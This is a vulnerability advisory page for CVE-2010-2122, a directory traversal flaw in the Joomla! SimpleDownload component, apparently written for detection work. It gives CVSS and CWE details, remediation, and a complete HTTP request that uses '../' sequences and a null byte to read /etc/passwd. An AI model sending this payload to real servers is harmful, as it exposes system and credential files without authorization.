🔙 목록으로 돌아가기

CVE-2010-2122: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval

TitleJoomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval
Authordaffainfo
SeverityMedium
ImpactAn attacker can retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score6.8
EPSS Score0.01818
CVE IDCVE-2010-2122
CWE IDCWE-22
Tags cve2010 cve joomla lfi edb joelrowley vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-2122.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-2122.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A